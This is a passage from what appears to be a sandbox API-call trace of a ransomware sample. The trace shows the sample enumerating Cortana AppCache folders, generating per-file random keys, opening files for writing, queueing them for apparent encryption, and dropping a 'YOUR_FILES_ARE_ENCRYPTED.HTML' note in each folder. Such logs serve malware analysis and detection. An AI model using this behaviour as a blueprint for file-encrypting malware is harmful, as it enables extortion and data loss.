param_1=0x19d7ca, param_2="%02X" | out: param_1="B9") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="93") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="DC") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="8A") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="86") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="D6") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="7C") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="0D") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="24") returned 2 [0119.130] lstrcpyW (in: lpString1=0x32d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt" [0119.130] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x32c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.130] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c81a0, lpOverlapped=0x32c81a0) returned 1 [0119.130] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebf36f47, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebf36f47, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59e48999, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x59e8, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", cAlternateFileName="C_0E6D~1.TXT")) returned 1 [0119.130] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.130] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt") returned 196 [0119.130] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt") returned=".txt" [0119.130] lstrlenW (lpString=".txt") returned 4 [0119.130] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt") returned=".txt" [0119.130] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_9[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0119.132] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=23016) returned 1 [0119.132] GetProcessHeap () returned 0x600000 [0119.132] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32f02f8 [0119.134] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="D2") returned 2 [0119.134] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="1F") returned 2 [0119.134] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="91") returned 2 [0119.134] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="F9") returned 2 [0119.134] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="38") returned 2 [0119.134] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="C5") returned 2 [0119.134] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="07") returned 2 [0119.134] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="CF") returned 2 [0119.134] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="31") returned 2 [0119.134] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="DF") returned 2 [0119.134] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="21") returned 2 [0119.134] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="D9") returned 2 [0119.134] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="55") returned 2 [0119.134] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="64") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="79") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="84") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="7C") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="18") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="C9") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="D1") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="3C") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="F3") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="AD") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="26") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="35") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="06") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="E9") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="76") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="47") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="6B") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="90") returned 2 [0119.135] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="25") returned 2 [0119.136] lstrcpyW (in: lpString1=0x33003ac, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt" [0119.136] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x32f02f8, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.136] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32f02f8, lpOverlapped=0x32f02f8) returned 1 [0119.136] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebf36f47, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebf36f47, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59e48999, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x59e8, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", cAlternateFileName="C_0E6D~1.TXT")) returned 0 [0119.136] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0119.136] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0119.136] GetProcessHeap () returned 0x600000 [0119.136] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0119.137] WriteFile (in: hFile=0x32c, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0119.138] CloseHandle (hObject=0x32c) returned 1 [0119.138] GetProcessHeap () returned 0x600000 [0119.138] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.138] GetProcessHeap () returned 0x600000 [0119.138] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.138] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74be545, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x74e4667, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x74e4667, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="8", cAlternateFileName="")) returned 1 [0119.139] StrStrIW (lpFirst="8", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.139] wnsprintfW (in: pszDest=0x3104fd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8") returned 111 [0119.139] GetProcessHeap () returned 0x600000 [0119.139] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0119.139] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8" [0119.139] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\*" [0119.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74be545, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x74e4667, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x75c698a, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0119.139] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74be545, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x74e4667, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x75c698a, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.139] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74e4667, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x74e4667, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x74e4667, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x3c, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="appcache[1].man", cAlternateFileName="APPCAC~1.MAN")) returned 1 [0119.139] StrStrIW (lpFirst="appcache[1].man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.163] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\appcache[1].man") returned 127 [0119.163] PathFindExtensionW (pszPath="appcache[1].man") returned=".man" [0119.163] lstrlenW (lpString=".man") returned 4 [0119.163] PathFindExtensionW (pszPath="appcache[1].man") returned=".man" [0119.164] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x74e4667, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x74e4667, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x74e4667, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0119.164] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.164] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\container.dat") returned 125 [0119.164] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.164] lstrlenW (lpString=".dat") returned 4 [0119.164] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.164] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\8\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0119.164] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0119.169] CloseHandle (hObject=0x318) returned 1 [0119.169] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x75c698a, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x75c698a, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x75eca26, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x1fcb6, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="zinc[1].htm", cAlternateFileName="ZINC_1~1.HTM")) returned 1 [0119.169] StrStrIW (lpFirst="zinc[1].htm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.169] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\zinc[1].htm") returned 123 [0119.169] PathFindExtensionW (pszPath="zinc[1].htm") returned=".htm" [0119.169] lstrlenW (lpString=".htm") returned 4 [0119.169] PathFindExtensionW (pszPath="zinc[1].htm") returned=".htm" [0119.169] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\zinc[1].htm" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\8\\zinc[1].htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0119.169] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=130230) returned 1 [0119.169] GetProcessHeap () returned 0x600000 [0119.169] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.171] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="A4") returned 2 [0119.172] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="D2") returned 2 [0119.172] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="37") returned 2 [0119.172] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="F1") returned 2 [0119.172] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="04") returned 2 [0119.172] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="11") returned 2 [0119.172] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="B3") returned 2 [0119.172] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="9D") returned 2 [0119.172] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="9F") returned 2 [0119.172] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="2F") returned 2 [0119.172] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="86") returned 2 [0119.172] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="36") returned 2 [0119.172] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="62") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="27") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="4E") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="F0") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="26") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="81") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="7A") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="B4") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="7D") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="27") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="07") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="31") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="ED") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="32") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="75") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="66") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="07") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="7A") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="1F") returned 2 [0119.172] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="06") returned 2 [0119.173] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\zinc[1].htm" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\zinc[1].htm") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\zinc[1].htm" [0119.173] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.173] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.175] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x75c698a, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x75c698a, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x75eca26, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x1fcb6, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="zinc[1].htm", cAlternateFileName="ZINC_1~1.HTM")) returned 0 [0119.178] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0119.178] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0119.178] GetProcessHeap () returned 0x600000 [0119.178] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\8\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\8\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0119.179] WriteFile (in: hFile=0x32c, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0119.180] CloseHandle (hObject=0x32c) returned 1 [0119.180] GetProcessHeap () returned 0x600000 [0119.180] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.180] GetProcessHeap () returned 0x600000 [0119.180] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.180] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6e134a22, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e134a22, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e134a22, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0119.180] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.180] wnsprintfW (in: pszDest=0x3104fd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\container.dat") returned 123 [0119.180] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.180] lstrlenW (lpString=".dat") returned 4 [0119.180] 